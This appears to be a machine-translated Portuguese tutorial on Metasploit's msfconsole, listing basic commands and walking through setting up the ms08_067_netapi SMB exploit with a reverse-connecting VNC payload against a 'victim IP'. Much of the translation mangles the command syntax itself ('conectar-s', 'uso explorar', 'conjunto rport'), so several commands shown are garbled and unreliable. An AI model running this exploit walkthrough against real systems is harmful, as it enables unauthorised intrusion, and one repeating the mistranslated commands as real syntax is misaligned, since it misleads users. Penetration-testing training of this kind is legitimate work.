Msfconsole
é um console ou um comando do Windows de metasploit que lhe dará o
apoio completo de comandos internos e externos Metasploit, houve uma
interface web de metasploit mas agora não temos essa opção.
Assim, no seu terminal tipo msfconsole para iniciar a consola metasploit.
root @ bt: ~ # msfconsole
Metasploit
também está disponível no GUI (graphical user interface), se você
deseja executar GUI metasploit do que no tipo de terminal.
root @ bt: ~ # msfgui
Ajuda
comando de metasploit lhe dará a idéia básica sobre o uso de
metasploit, se você está procurando ajuda msfconsole do que do tipo de
janelas de raiz
root @ bt: ~ # msfconsole -h
Para o uso msfconsole você precisa estar na janela msfconsole para obter a ajuda.
msf> help
Conecte
comando é nada, mas o suplente telnet e NCAT em metasploit, use o
comando Conectar para se conectar com o host remoto e local sobre
metasploit você pode definir o IP da máquina host.
msf> conectar-s www.metasploit.com 443[*] Conectado a www.metasploit.com:443GET / HTTP / 1.0
-s → SSL
Comando ping de msfconsole é verificar o anfitrião vivo e assim por diante.
msf> ping 192.168.1.45
Mostrar exploits é um comando para verificar todos os exploits disponíveis no metasploit
msf> mostrar exploits
Mostrar cargas úteis apenas como mostram façanhas, show payloads irá mostrar-lhe todas as cargas disponíveis no Metasploit.
msf> show payloads
Informações comando vai lhe dar mais informações sobre quaisquer exploits e payloads.
Msf> info <explorar>msf> info <payload>
Use o comando vai dar metasploit uma instrução para usar um 'exploit' ou carga útil.
msf> uso explorar / windows / SMB / ms08_067_netapiMSF exploit (ms08_067_netapi)>
MSF explorar (ms08_067_netapi)> Opções do show para mostrar as opções disponíveis
MSF exploit (ms08_067_netapi)> set RHOST 119.67.45.2 → Para definir IP remoto (vítima IP)
MSF exploit (ms08_067_netapi)> set lhost 192.168.1.45 → Para definir IP local (atacante IP)
MSF exploit (ms08_067_netapi)> conjunto rport 445 → Para definir o número da porta do host remoto
MSF exploit (ms08_067_netapi)> set lport 443 → Para definir o número da porta do host local
MSF exploit (ms08_067_netapi)> definidas janelas de carga / vncinject / reverse_tcp_dns → Tp conjunto payload
MSF exploit (ms08_067_netapi)> unset RHOST → Para remover RHOST
MSF exploit (ms08_067_netapi)> unset lhost → Para remover host local
MSF exploit (ms08_067_netapi)> explorar → Para executar explorar
MSF exploit (ms08_067_netapi)> voltar → Para voltar na janela principal
MSF explorar (ms08_067_netapi)> Sessões -l → Para verificar qualquer sessão ativa
MSF explorar (ms08_067_netapi)> Sessões -i ID → Para ir em um ID de sessão ativa deve ser o número numérico
Free Online Security Training – Metasploit Unleashed: Aqui